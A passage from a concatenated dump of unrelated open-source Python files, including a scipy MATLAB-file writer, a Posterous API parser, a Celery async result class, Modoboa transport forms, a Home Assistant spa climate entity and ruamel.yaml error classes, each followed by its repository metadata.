            self.file_stream.write(b'\x00' * (8-bc_mod_8))

    def write_header(self,
                     shape,
                     mclass,
                     is_complex=False,
                     is_logical=False,
                     nzmax=0):
        ''' Write header for given data options

        shape : sequence
           array shape
        mclass - mat5 matrix class
        is_complex - True if matrix is complex
        is_logical - True if matrix is logical
        nzmax - max non zero elements for sparse arrays

        We get the name and the global flag from the object, and reset
        them to defaults after we've used them
        '''
        # get name and is_global from one-shot object store
        name = self._var_name
        is_global = self._var_is_global
        # initialize the top-level matrix tag, store position
        self._mat_tag_pos = self.file_stream.tell()
        self.write_bytes(self.mat_tag)
        # write array flags (complex, global, logical, class, nzmax)
        af = np.zeros((), NDT_ARRAY_FLAGS)
        af['data_type'] = miUINT32
        af['byte_count'] = 8
        flags = is_complex << 3 | is_global << 2 | is_logical << 1
        af['flags_class'] = mclass | flags << 8
        af['nzmax'] = nzmax
        self.write_bytes(af)
        # shape
        self.write_element(np.array(shape, dtype='i4'))
        # write name
        name = np.asarray(name)
        if name == '':  # empty string zero-terminated
            self.write_smalldata_element(name, miINT8, 0)
        else:
            self.write_element(name, miINT8)
        # reset the one-shot store to defaults
        self._var_name = ''
        self._var_is_global = False

    def update_matrix_tag(self, start_pos):
        # Go back and fill in the byte count of the miMATRIX element now
        # that we know where the write ended.
        curr_pos = self.file_stream.tell()
        self.file_stream.seek(start_pos)
        # write byte_count in tag
        byte_count = curr_pos - start_pos - 8
        if byte_count >= 2**32:
            raise MatWriteError("Matrix too large to save with Matlab "
                                "5 format")
        self.mat_tag['byte_count'] = byte_count
        self.write_bytes(self.mat_tag)
        self.file_stream.seek(curr_pos)

    def write_top(self, arr, name, is_global):
        """ Write variable at top level of mat file

        Parameters
        ----------
        arr : array_like
            array-like object to create writer for
        name : str, optional
            name as it will appear in matlab workspace
            default is empty string
        is_global : {False, True}, optional
            whether variable will be global on load into matlab
        """
        # these are set before the top-level header write, and unset at
        # the end of the same write, because they do not apply for lower levels
        self._var_is_global = is_global
        self._var_name = name
        # write the header and data
        self.write(arr)

    def write(self, arr):
        ''' Write `arr` to stream at top and sub levels

        Parameters
        ----------
        arr : array_like
            array-like object to create writer for
        '''
        # store position, so we can update the matrix tag
        mat_tag_pos = self.file_stream.tell()
        # First check if these are sparse
        if scipy.sparse.issparse(arr):
            self.write_sparse(arr)
            self.update_matrix_tag(mat_tag_pos)
            return
        # Try to convert things that aren't arrays
        narr = to_writeable(arr)
        if narr is None:
            raise TypeError('Could not convert %s (type %s) to array'
                            % (arr, type(arr)))
        # Dispatch on the converted type / dtype.
        if isinstance(narr, MatlabObject):
            self.write_object(narr)
        elif isinstance(narr, MatlabFunction):
            raise MatWriteError('Cannot write matlab functions')
        elif narr is EmptyStructMarker:  # empty struct array
            self.write_empty_struct()
        elif narr.dtype.fields:  # struct array
            self.write_struct(narr)
        elif narr.dtype.hasobject:  # cell array
            self.write_cells(narr)
        elif narr.dtype.kind in ('U', 'S'):
            if self.unicode_strings:
                codec = 'UTF8'
            else:
                codec = 'ascii'
            self.write_char(narr, codec)
        else:
            self.write_numeric(narr)
        self.update_matrix_tag(mat_tag_pos)

    def write_numeric(self, arr):
        imagf = arr.dtype.kind == 'c'
        logif = arr.dtype.kind == 'b'
        try:
            mclass = NP_TO_MXTYPES[arr.dtype.str[1:]]
        except KeyError:
            # No matching matlab type, probably complex256 / float128 / float96
            # Cast data to complex128 / float64.
            if imagf:
                arr = arr.astype('c128')
            elif logif:
                arr = arr.astype('i1')  # Should only contain 0/1
            else:
                arr = arr.astype('f8')
            mclass = mxDOUBLE_CLASS
        self.write_header(matdims(arr, self.oned_as),
                          mclass,
                          is_complex=imagf,
                          is_logical=logif)
        if imagf:
            # complex data stored as separate real and imaginary elements
            self.write_element(arr.real)
            self.write_element(arr.imag)
        else:
            self.write_element(arr)

    def write_char(self, arr, codec='ascii'):
        ''' Write string array `arr` with given `codec`
        '''
        if arr.size == 0 or np.all(arr == ''):
            # This is an empty string array or a string array containing
            # only empty strings. Matlab cannot distinguish between a
            # string array that is empty, and a string array containing
            # only empty strings, because it stores strings as arrays of
            # char. There is no way of having an array of char that is
            # not empty, but contains an empty string. We have to
            # special-case the array-with-empty-strings because even
            # empty strings have zero padding, which would otherwise
            # appear in matlab as a string with a space.
            shape = (0,) * np.max([arr.ndim, 2])
            self.write_header(shape, mxCHAR_CLASS)
            self.write_smalldata_element(arr, miUTF8, 0)
            return
        # non-empty string.
        #
        # Convert to char array
        arr = arr_to_chars(arr)
        # We have to write the shape directly, because we are going to
        # recode the characters, and the resulting stream of chars
        # may have a different length
        shape = arr.shape
        self.write_header(shape, mxCHAR_CLASS)
        if arr.dtype.kind == 'U' and arr.size:
            # Make one long string from all the characters.  We need to
            # transpose here, because we're flattening the array, before
            # we write the bytes.  The bytes have to be written in
            # Fortran order.
            n_chars = np.product(shape)
            st_arr = np.ndarray(shape=(),
                                dtype=arr_dtype_number(arr, n_chars),
                                buffer=arr.T.copy())  # Fortran order
            # Recode with codec to give byte string
            st = st_arr.item().encode(codec)
            # Reconstruct as one-dimensional byte array
            arr = np.ndarray(shape=(len(st),),
                             dtype='S1',
                             buffer=st)
        self.write_element(arr, mdtype=miUTF8)

    def write_sparse(self, arr):
        ''' Sparse matrices are 2D
        '''
        A = arr.tocsc()  # convert to sparse CSC format
        A.sort_indices()  # MATLAB expects sorted row indices
        is_complex = (A.dtype.kind == 'c')
        is_logical = (A.dtype.kind == 'b')
        nz = A.nnz
        self.write_header(matdims(arr, self.oned_as),
                          mxSPARSE_CLASS,
                          is_complex=is_complex,
                          is_logical=is_logical,
                          # matlab won't load file with 0 nzmax
                          nzmax=1 if nz == 0 else nz)
        self.write_element(A.indices.astype('i4'))
        self.write_element(A.indptr.astype('i4'))
        self.write_element(A.data.real)
        if is_complex:
            self.write_element(A.data.imag)

    def write_cells(self, arr):
        self.write_header(matdims(arr, self.oned_as),
                          mxCELL_CLASS)
        # loop over data, column major
        A = np.atleast_2d(arr).flatten('F')
        for el in A:
            self.write(el)

    def write_empty_struct(self):
        self.write_header((1, 1), mxSTRUCT_CLASS)
        # max field name length set to 1 in an example matlab struct
        self.write_element(np.array(1, dtype=np.int32))
        # Field names element is empty
        self.write_element(np.array([], dtype=np.int8))

    def write_struct(self, arr):
        self.write_header(matdims(arr, self.oned_as),
                          mxSTRUCT_CLASS)
        self._write_items(arr)

    def _write_items(self, arr):
        # write fieldnames
        fieldnames = [f[0] for f in arr.dtype.descr]
        length = max([len(fieldname) for fieldname in fieldnames])+1
        max_length = (self.long_field_names and 64) or 32
        if length > max_length:
            raise ValueError("Field names are restricted to %d characters" %
                             (max_length-1))
        self.write_element(np.array([length], dtype='i4'))
        self.write_element(
            np.array(fieldnames, dtype='S%d' % (length)),
            mdtype=miINT8)
        # write the field values, column major, field-by-field per record
        A = np.atleast_2d(arr).flatten('F')
        for el in A:
            for f in fieldnames:
                self.write(el[f])

    def write_object(self, arr):
        '''Same as writing structs, except different mx class, and extra
        classname element after header
        '''
        self.write_header(matdims(arr, self.oned_as),
                          mxOBJECT_CLASS)
        self.write_element(np.array(arr.classname, dtype='S'),
                           mdtype=miINT8)
        self._write_items(arr)
class MatFile5Writer(object):
''' Class for writing mat5 files '''
    @docfiller
    def __init__(self, file_stream,
                 do_compression=False,
                 unicode_strings=False,
                 global_vars=None,
                 long_field_names=False,
                 oned_as='row'):
        ''' Initialize writer for matlab 5 format files

        Parameters
        ----------
        %(do_compression)s
        %(unicode_strings)s
        global_vars : None or sequence of strings, optional
            Names of variables to be marked as global for matlab
        %(long_fields)s
        %(oned_as)s
        '''
        self.file_stream = file_stream
        self.do_compression = do_compression
        self.unicode_strings = unicode_strings
        if global_vars:
            self.global_vars = global_vars
        else:
            self.global_vars = []
        self.long_field_names = long_field_names
        self.oned_as = oned_as
        # matrix writer is (re)created on each put_variables call
        self._matrix_writer = None
def write_file_header(self):
# write header
hdr = np.zeros((), NDT_FILE_HDR)
hdr['description'] = 'MATLAB 5.0 MAT-file Platform: %s, Created on: %s' \
% (os.name,time.asctime())
hdr['version'] = 0x0100
hdr['endian_test'] = np.ndarray(shape=(),
dtype='S2',
buffer=np.uint16(0x4d49))
self.file_stream.write(hdr.tostring())
def put_variables(self, mdict, write_header=None):
''' Write variables in `mdict` to stream
Parameters
----------
mdict : mapping
mapping with method ``items`` returns name, contents pairs where
``name`` which will appear in the matlab workspace in file load, and
``contents`` is something writeable to a matlab file, such as a numpy
array.
write_header : {None, True, False}, optional
If True, then write the matlab file header before writing the
variables. If None (the default) then write the file header
if we are at position 0 in the stream. By setting False
here, and setting the stream position to the end of the file,
you can append variables to a matlab file
'''
# write header if requested, or None and start of file
if write_header is None:
write_header = self.file_stream.tell() == 0
if write_header:
self.write_file_header()
self._matrix_writer = VarWriter5(self)
for name, var in mdict.items():
if name[0] == '_':
continue
is_global = name in self.global_vars
if self.do_compression:
stream = BytesIO()
self._matrix_writer.file_stream = stream
self._matrix_writer.write_top(var, asbytes(name), is_global)
out_str = zlib.compress(stream.getvalue())
tag = np.empty((), NDT_TAG_FULL)
tag['mdtype'] = miCOMPRESSED
tag['byte_count'] = len(out_str)
self.file_stream.write(tag.tostring())
self.file_stream.write(out_str)
else: # not compressing
self._matrix_writer.write_top(var, asbytes(name), is_global)
|
kenshay/ImageScript
|
ProgramData/SystemFiles/Python/Lib/site-packages/scipy/io/matlab/mio5.py
|
Python
|
gpl-3.0
| 31,895
|
# -*- coding: utf-8 -*-
#
# Copyright 2008 - 2019 Brian R. D'Urso
#
# This file is part of Python Instrument Control System, also known as Pythics.
#
# Pythics is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pythics is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Pythics. If not, see <http://www.gnu.org/licenses/>.
#
# Explicit public API: star-imports from this package expose only 'lib'.
__all__ = ['lib']
|
dursobr/Pythics
|
pythics/__init__.py
|
Python
|
gpl-3.0
| 802
|
#hw 1/ task8/ Sergei Shybkoi
# Print every third element of the tuple, first with a plain extended
# slice and then with an equivalent negative-index slice.
# NOTE: Python 2 syntax (print statement).
t = (1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 'a', 'b', 'c')
print "Set:",t
print "Each third element:"
print t[2::3]
print t[-1*len(t)+2:-1:3]
|
pybursa/homeworks
|
s_shybkoy/hw1/hw1_task8_ShybkoiSergei.py
|
Python
|
gpl-2.0
| 162
|
# Copyright (c) "Neo4j"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from neo4j import Query
# TODO: this test will stay until a uniform behavior for `.single()` across the
# drivers has been specified and tests are created in testkit
def test_result_single_record_value(session):
    """A one-row query result exposes its value via single().value()."""
    result = session.run(Query("RETURN $x"), x=1)
    record = result.single()
    assert record.value() == 1
|
neo4j/neo4j-python-driver
|
tests/integration/test_autocommit.py
|
Python
|
apache-2.0
| 951
|
# Copyright:
# Copyright (c) 2010, Benjamin Reitzammer <http://github.com/nureineide>,
# All rights reserved.
#
# License:
# This program is free software. You can distribute/modify this program under
# the terms of the Apache License Version 2.0 available at
# http://www.apache.org/licenses/LICENSE-2.0.txt
import xml.etree.cElementTree as ET
from posterous.models import ModelFactory, attribute_map
#from posterous.utils import import_simplejson
import json
from posterous.error import PosterousError
def set_type(name, value):
    """Convert `value` with the converter registered for `name`.

    `attribute_map` maps tuples of attribute names to converter
    callables; when no tuple contains `name` the value is returned
    unchanged (most likely a string).
    """
    for name_group in attribute_map:
        if name not in name_group:
            continue
        converter = attribute_map.get(name_group)
        return converter(value)
    return value
class XMLDict(dict):
    """
    Traverses the XML tree recursively and builds an object
    representation of each element. Element attributes are not
    read since they don't appear in any current Posterous API
    response. Returns a dictionary of objects.

    Modified from: http://code.activestate.com/recipes/410469/
    """
    def __init__(self, parent_element):
        # Tag names of all direct children, used to detect repeated
        # sibling tags that must be grouped into a list.
        childrenNames = list((child.tag for child in parent_element))
        for element in parent_element:
            tag = element.tag.lower()
            # NOTE: ElementTree truthiness -- `if element:` means the
            # element has child elements.
            if element:
                if len(element) == 1 or element[0].tag != element[1].tag:
                    # we assume that if the first two tags in a series are
                    # different, then they are all different.
                    aDict = XMLDict(element)
                else:
                    # treat like list
                    aDict = {element[0].tag.lower(): XMLList(element)}
                if childrenNames.count(tag) > 1:
                    # there are multiple siblings with this tag, so they
                    # must be grouped together
                    try:
                        # move this element's dict under the first sibling
                        self[tag].append(aDict)
                    except KeyError:
                        # the first for this tag
                        self.update({tag: [aDict]})
                else:
                    self.update({tag: aDict})
            else:
                # finally, if there are no child tags, extract the text
                value = set_type(tag, element.text.strip())
                if childrenNames.count(tag) > 1:
                    # there are multiple instances of this tag, so they
                    # must be grouped together
                    try:
                        # append this tags text to the tag's matching list
                        self[tag].append(value)
                    except KeyError:
                        # the first for this tag
                        self.update({tag: [value]})
                else:
                    self.update({tag: value})
class XMLList(list):
    """
    Similar to the XMLDict class; traverses a list of element
    siblings and creates a list of their values.

    Modified from: http://code.activestate.com/recipes/410469/
    """
    def __init__(self, aList):
        for element in aList:
            # `if element:` is true when the element has child elements.
            if element:
                # Recurse, picking dict vs list representation the same
                # way XMLDict does.
                if len(element) == 1 or element[0].tag != element[1].tag:
                    self.append(XMLDict(element))
                else:
                    self.append(XMLList(element))
            elif element.text:
                # Leaf element: keep its converted text when non-empty.
                text = set_type(element.tag.lower(), element.text.strip())
                if text:
                    self.append(text)
class XMLParser(object):
    """Parses a Posterous XML API response into nested dict/list objects."""
    def __init__(self):
        pass
    def parse(self, method, payload):
        """Parses the XML payload and returns a dict of objects"""
        root = ET.XML(payload)
        if root.tag != 'rsp':
            raise PosterousError('XML response is missing the status tag! ' \
                                 'The response may be malformed.')
        # Verify that the response was successful before parsing
        if root.get('stat') == 'fail':
            error = root[0]
            self.parse_error(error)
        else:
            # There are nesting inconsistencies in the response XML
            # with some tags appearing below the payload model element.
            # This is a problem when the payload_type is _not_ a list.
            # If the root has multiple children, all siblings of the first
            # child will be moved under said child.
            if not method.payload_list and len(root) > 1:
                # root[1:] produces a copied list, so removing children
                # from `root` inside the loop is safe.
                for node in root[1:]:
                    root[0].append(node)
                    root.remove(node)
            if method.payload_list:
                # A list of results is expected
                result = []
                for node in root:
                    result.append(XMLDict(node))
            else:
                # Move to the first child before parsing the tree
                result = XMLDict(root[0])
            # Make sure the values are formatted properly
            return self.cleanup(result)
    def parse_error(self, error):
        # Build a PosterousError from the error element's attributes.
        raise PosterousError(error.get('msg'), error.get('code'))
    def cleanup(self, output):
        # Normalise parsed objects: rename 'comment' to 'comments' and
        # ensure both 'comments' and 'media' are always lists.
        def clean(obj):
            if 'comment' in obj:
                comments = obj['comment']
                del obj['comment']
                # make it a list
                if not isinstance(comments, list):
                    comments = [comments]
                obj['comments'] = comments
            if 'media' in obj:
                # make it a list
                if not isinstance(obj['media'], list):
                    obj['media'] = [obj['media']]
            return obj
        if isinstance(output, list):
            output = list((clean(obj) for obj in output))
        else:
            output = clean(output)
        return output
class JSONParser(object):
    """Thin parser that decodes a JSON payload into Python objects."""
    def __init__(self):
        pass
    def parse(self, method, payload):
        """Decode `payload` (a JSON document) and return the result.

        `method` is unused; it is accepted to keep the interface uniform
        with the other parser classes.
        """
        return json.loads(payload)
class ModelParser(object):
    """Used for parsing a method response into a model object."""
    def __init__(self, model_factory=None):
        # Allow a custom factory to be injected; fall back to the
        # package-wide ModelFactory.
        self.model_factory = model_factory or ModelFactory
    def parse(self, method, payload):
        # Get the appropriate model for this payload
        try:
            # Methods with no payload type produce no model (return None).
            if method.payload_type is None:
                return
            model = getattr(self.model_factory, method.payload_type)
        except AttributeError:
            raise Exception('No model for this payload type: %s' %
                            method.payload_type)
        # The payload XML must be parsed into a dict of objects before
        # being used in the model.
        if method.response_type == 'xml':
            xml_parser = XMLParser()
            data = xml_parser.parse(method, payload)
        elif method.response_type == 'json':
            json_parser = JSONParser()
            data = json_parser.parse(method, payload)
        else:
            raise NotImplementedError
        return model.parse(method.api, data)
|
jmoz/posterous-python-wp_fork
|
posterous/parsers.py
|
Python
|
mit
| 7,146
|
from __future__ import absolute_import
from __future__ import with_statement
from functools import partial
import celery
class AsyncResult(celery.result.AsyncResult):
    """Celery AsyncResult whose state can be filled in from a pushed
    reply (see `on_result`) instead of polling the result backend."""
    def __init__(self, task_id, status=None, traceback=None,
                 result=None, producer=None, **kwargs):
        super(AsyncResult, self).__init__(task_id)
        # Locally cached values; properties below fall back to the
        # parent implementation (the result backend) when unset.
        self._status = status
        self._traceback = traceback
        self._result = result
        self._producer = producer
    @property
    def status(self):
        # Prefer the pushed status over a backend round-trip.
        return self._status or super(AsyncResult, self).status
    state = status
    @property
    def traceback(self):
        # Only trust the cached traceback once a result has arrived.
        if self._result is not None:
            return self._traceback
        else:
            return super(AsyncResult, self).traceback
    @property
    def result(self):
        return self._result or super(AsyncResult, self).result
    def get(self, callback=None):
        # Asynchronously wait for the task reply; `callback` receives
        # the task result once `on_result` has decoded it.
        self._producer.fail_if_backend_not_supported()
        self._producer.consumer.wait_for(self.task_id,
                partial(self.on_result, callback),
                expires=self._producer.prepare_expires(type=int),
                persistent=self._producer.app.conf.CELERY_RESULT_PERSISTENT)
    def on_result(self, callback, reply):
        # Decode the pushed reply and cache its fields locally.
        reply = self._producer.decode(reply)
        self._status = reply.get('status')
        self._traceback = reply.get('traceback')
        self._result = reply.get('result')
        if callback:
            callback(self._result)
    def _get_task_meta(self):
        self._producer.fail_if_backend_not_supported()
        return super(AsyncResult, self)._get_task_meta()
    def maybe_reraise(self):
        # For failure states the backend stores the exception instance
        # as the result, so raising it re-raises the original error.
        if self.state in celery.states.PROPAGATE_STATES:
            raise super(AsyncResult, self).result
|
qudos-com/tornado-celery
|
tcelery/result.py
|
Python
|
bsd-3-clause
| 1,841
|
# -*- coding: utf-8 -*-
"""Transport forms."""
from __future__ import unicode_literals
from django import forms
from . import backends, models
# Map a backend setting "type" string to the Django form field class
# used to render it.
TYPE_TO_FIELD_MAP = {
    "int": forms.IntegerField,
    "boolean": forms.BooleanField,
    "string": forms.CharField
}
class BackendSettingsMixin(object):
    """A mixin to deal with backend settings in a model form."""
    def __init__(self, *args, **kwargs):
        """Constructor."""
        super(BackendSettingsMixin, self).__init__(*args, **kwargs)
        # Names of the dynamically injected backend setting fields.
        self.setting_field_names = []
    def inject_backend_settings(self, name, settings):
        """Inject backend settings to form.

        Each setting dict describes one form field; the field name is
        the backend name plus the setting name ("<backend>_<setting>").
        """
        for setting in settings:
            fullname = "{}_{}".format(name, setting["name"])
            options = {}
            ftype = setting.get("type", "string")
            # Existing instances provide their stored value; otherwise
            # use the backend-declared default, if any.
            if self.instance.pk:
                options["initial"] = self.instance._settings.get(fullname)
            elif "default" in setting:
                options["initial"] = setting["default"]
            if "widget" in setting:
                options["widget"] = setting["widget"]
            self.fields[fullname] = TYPE_TO_FIELD_MAP[ftype](
                label=setting["label"], required=False, **options)
            self.setting_field_names.append(fullname)
    def clean_backend_fields(self, name):
        """Clean backend fields.

        Delegates validation to the backend and attaches any returned
        (field, error) pairs to the form.
        """
        self.backend = backends.manager.get_backend(name)
        for field, error in self.backend.clean_fields(self.cleaned_data):
            self.add_error(field, error)
    def save(self, commit=True):
        """Set settings to JSON field."""
        transport = super(BackendSettingsMixin, self).save(commit=False)
        transport._settings = {
            name: self.cleaned_data[name]
            for name in self.setting_field_names
        }
        if commit:
            transport.save()
        return transport
class TransportForm(BackendSettingsMixin, forms.ModelForm):
    """Transport model form."""
    service = forms.ChoiceField(choices=[])
    class Meta:
        fields = ("pattern", "service")
        model = models.Transport
    def __init__(self, *args, **kwargs):
        """Set backend list."""
        super(TransportForm, self).__init__(*args, **kwargs)
        self.fields["service"].choices = backends.manager.get_backend_list()
        settings = backends.manager.get_all_backend_settings()
        # Expose every backend's settings; only the selected backend's
        # fields become required at clean time (see _clean_fields).
        for name, backend_settings in settings.items():
            self.inject_backend_settings(name, backend_settings)
    @property
    def setting_fields(self):
        # Bound fields for all injected backend settings.
        return [self[name] for name in self.setting_field_names]
    def _clean_fields(self):
        """Make backend settings required."""
        backend_name = self.data.get("service")
        backend_settings = backends.manager.get_backend_settings(backend_name)
        for name, field in self.fields.items():
            if name.startswith("{}_".format(backend_name)):
                name = name.replace("{}_".format(backend_name), "")
                # NOTE(review): if no setting matches `name`, `setting`
                # keeps the last iterated value below -- looks like the
                # settings list is assumed to cover every injected
                # field; confirm.
                for setting in backend_settings:
                    if setting["name"] == name:
                        break
                if setting.get("required", True):
                    field.required = True
        return super(TransportForm, self)._clean_fields()
    def clean(self):
        """Check values."""
        cleaned_data = super(TransportForm, self).clean()
        if self.errors:
            return cleaned_data
        self.clean_backend_fields(cleaned_data["service"])
        return cleaned_data
|
tonioo/modoboa
|
modoboa/transport/forms.py
|
Python
|
isc
| 3,543
|
"""Support for Balboa Spa Wifi adaptor."""
from __future__ import annotations
import asyncio
from homeassistant.components.climate import ClimateEntity
from homeassistant.components.climate.const import (
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
FAN_HIGH,
FAN_LOW,
FAN_MEDIUM,
FAN_OFF,
HVAC_MODE_AUTO,
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_HALVES,
PRECISION_WHOLE,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from .const import CLIMATE, CLIMATE_SUPPORTED_FANSTATES, CLIMATE_SUPPORTED_MODES, DOMAIN
from .entity import BalboaEntity
# Seconds slept after switching temperature range, before sending the new
# set point -- presumably to let the spa apply the range change; confirm.
SET_TEMPERATURE_WAIT = 1
async def async_setup_entry(hass, entry, async_add_entities):
    """Set up the spa climate device."""
    # One climate entity per config entry; the spa client object was
    # stored in hass.data by the integration setup.
    async_add_entities(
        [
            BalboaSpaClimate(
                entry,
                hass.data[DOMAIN][entry.entry_id],
                CLIMATE,
            )
        ],
    )
class BalboaSpaClimate(BalboaEntity, ClimateEntity):
    """Representation of a Balboa Spa Climate device."""
    _attr_icon = "mdi:hot-tub"
    _attr_fan_modes = CLIMATE_SUPPORTED_FANSTATES
    _attr_hvac_modes = CLIMATE_SUPPORTED_MODES
    def __init__(self, entry, client, devtype, num=None):
        """Initialize the climate entity."""
        super().__init__(entry, client, devtype, num)
        # Translation tables between the balboa client's blower/heat-mode
        # constants and Home Assistant's fan/HVAC modes (built both ways).
        self._balboa_to_ha_blower_map = {
            self._client.BLOWER_OFF: FAN_OFF,
            self._client.BLOWER_LOW: FAN_LOW,
            self._client.BLOWER_MEDIUM: FAN_MEDIUM,
            self._client.BLOWER_HIGH: FAN_HIGH,
        }
        self._ha_to_balboa_blower_map = {
            value: key for key, value in self._balboa_to_ha_blower_map.items()
        }
        self._balboa_to_ha_heatmode_map = {
            self._client.HEATMODE_READY: HVAC_MODE_HEAT,
            self._client.HEATMODE_RNR: HVAC_MODE_AUTO,
            self._client.HEATMODE_REST: HVAC_MODE_OFF,
        }
        self._ha_heatmode_to_balboa_map = {
            value: key for key, value in self._balboa_to_ha_heatmode_map.items()
        }
        scale = self._client.get_tempscale()
        self._attr_preset_modes = self._client.get_heatmode_stringlist()
        self._attr_supported_features = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE
        # Fan control is only offered when the spa actually has a blower.
        if self._client.have_blower():
            self._attr_supported_features |= SUPPORT_FAN_MODE
        self._attr_min_temp = self._client.tmin[self._client.TEMPRANGE_LOW][scale]
        self._attr_max_temp = self._client.tmax[self._client.TEMPRANGE_HIGH][scale]
        # Default to Fahrenheit; switch to Celsius (with half-degree
        # precision) when the spa reports a Celsius temperature scale.
        self._attr_temperature_unit = TEMP_FAHRENHEIT
        self._attr_precision = PRECISION_WHOLE
        if self._client.get_tempscale() == self._client.TSCALE_C:
            self._attr_temperature_unit = TEMP_CELSIUS
            self._attr_precision = PRECISION_HALVES
    @property
    def hvac_mode(self) -> str:
        """Return the current HVAC mode."""
        mode = self._client.get_heatmode()
        return self._balboa_to_ha_heatmode_map[mode]
    @property
    def hvac_action(self) -> str:
        """Return the current operation mode."""
        state = self._client.get_heatstate()
        if state >= self._client.ON:
            return CURRENT_HVAC_HEAT
        return CURRENT_HVAC_IDLE
    @property
    def fan_mode(self) -> str:
        """Return the current fan mode."""
        fanmode = self._client.get_blower()
        return self._balboa_to_ha_blower_map.get(fanmode, FAN_OFF)
    @property
    def current_temperature(self):
        """Return the current temperature."""
        return self._client.get_curtemp()
    @property
    def target_temperature(self):
        """Return the target temperature we try to reach."""
        return self._client.get_settemp()
    @property
    def preset_mode(self):
        """Return current preset mode."""
        return self._client.get_heatmode(True)
    async def async_set_temperature(self, **kwargs):
        """Set a new target temperature."""
        scale = self._client.get_tempscale()
        newtemp = kwargs[ATTR_TEMPERATURE]
        # Switch temperature range first when the requested temperature
        # falls outside the currently selected range.
        if newtemp > self._client.tmax[self._client.TEMPRANGE_LOW][scale]:
            await self._client.change_temprange(self._client.TEMPRANGE_HIGH)
            await asyncio.sleep(SET_TEMPERATURE_WAIT)
        if newtemp < self._client.tmin[self._client.TEMPRANGE_HIGH][scale]:
            await self._client.change_temprange(self._client.TEMPRANGE_LOW)
            await asyncio.sleep(SET_TEMPERATURE_WAIT)
        await self._client.send_temp_change(newtemp)
    async def async_set_preset_mode(self, preset_mode) -> None:
        """Set new preset mode."""
        modelist = self._client.get_heatmode_stringlist()
        # NOTE(review): _async_validate_mode_or_raise compares against
        # HEATMODE_RNR while `preset_mode` here is a string -- confirm the
        # intended argument type for the validation call.
        self._async_validate_mode_or_raise(preset_mode)
        if preset_mode not in modelist:
            raise ValueError(f"{preset_mode} is not a valid preset mode")
        await self._client.change_heatmode(modelist.index(preset_mode))
    async def async_set_fan_mode(self, fan_mode):
        """Set new fan mode."""
        await self._client.change_blower(self._ha_to_balboa_blower_map[fan_mode])
    def _async_validate_mode_or_raise(self, mode):
        """Check that the mode can be set."""
        if mode == self._client.HEATMODE_RNR:
            raise ValueError(f"{mode} can only be reported but not set")
    async def async_set_hvac_mode(self, hvac_mode):
        """Set new target hvac mode.

        OFF = Rest
        AUTO = Ready in Rest (can't be set, only reported)
        HEAT = Ready
        """
        mode = self._ha_heatmode_to_balboa_map[hvac_mode]
        self._async_validate_mode_or_raise(mode)
        await self._client.change_heatmode(self._ha_heatmode_to_balboa_map[hvac_mode])
|
home-assistant/home-assistant
|
homeassistant/components/balboa/climate.py
|
Python
|
apache-2.0
| 5,803
|
from girder_worker import GirderWorkerPluginABC
class DockerPlugin(GirderWorkerPluginABC):
    """Girder Worker plugin that wires in the docker-based task modules."""
    def __init__(self, app, *args, **kwargs):
        # Keep a reference to the application object handed over by the
        # worker core; extra arguments are accepted but unused.
        self.app = app
    def task_imports(self):
        """Return the module paths girder_worker should import for tasks."""
        return ['girder_worker.docker.tasks']
|
girder/girder_worker
|
girder_worker/docker/__init__.py
|
Python
|
apache-2.0
| 238
|
# coding: utf-8
from __future__ import absolute_import
__all__ = ['Mark', 'YAMLError', 'MarkedYAMLError']
try:
from .compat import utf8
except (ImportError, ValueError): # for Jython
from ruamel.yaml.compat import utf8
class Mark(object):
    """A position (name, index, line, column) within a YAML source buffer."""
    def __init__(self, name, index, line, column, buffer, pointer):
        self.name = name
        self.index = index
        self.line = line
        self.column = column
        self.buffer = buffer
        self.pointer = pointer
    def get_snippet(self, indent=4, max_length=75):
        """Return an annotated excerpt around the mark, or None when the
        underlying buffer is unavailable."""
        if self.buffer is None:
            return None
        breaks = u'\0\r\n\x85\u2028\u2029'
        prefix = ''
        begin = self.pointer
        # Walk backwards to the line start, truncating with ' ... ' when
        # the excerpt would exceed half the allowed width.
        while (begin > 0 and
                self.buffer[begin-1] not in breaks):
            begin -= 1
            if self.pointer-begin > max_length/2-1:
                prefix = ' ... '
                begin += 5
                break
        suffix = ''
        finish = self.pointer
        # Walk forwards to the line end, truncating symmetrically.
        while (finish < len(self.buffer) and
                self.buffer[finish] not in breaks):
            finish += 1
            if finish-self.pointer > max_length/2-1:
                suffix = ' ... '
                finish -= 5
                break
        excerpt = utf8(self.buffer[begin:finish])
        caret_pad = ' '*(indent+self.pointer-begin+len(prefix))
        return ' '*indent + prefix + excerpt + suffix + '\n' \
            + caret_pad + '^'
    def __str__(self):
        where = " in \"%s\", line %d, column %d" \
            % (self.name, self.line+1, self.column+1)
        snippet = self.get_snippet()
        if snippet is not None:
            where += ":\n"+snippet
        return where
class YAMLError(Exception):
    """Base class for all YAML-processing errors."""
    pass
class MarkedYAMLError(YAMLError):
    """A YAMLError carrying context/problem descriptions plus the marks
    (source positions) where they occurred."""
    def __init__(self, context=None, context_mark=None,
                 problem=None, problem_mark=None, note=None):
        self.context = context
        self.context_mark = context_mark
        self.problem = problem
        self.problem_mark = problem_mark
        self.note = note
    def __str__(self):
        parts = []
        if self.context is not None:
            parts.append(self.context)
        # Only show the context mark when it adds information beyond the
        # problem mark (different file, line or column).
        show_context_mark = (
            self.context_mark is not None
            and (self.problem is None or self.problem_mark is None
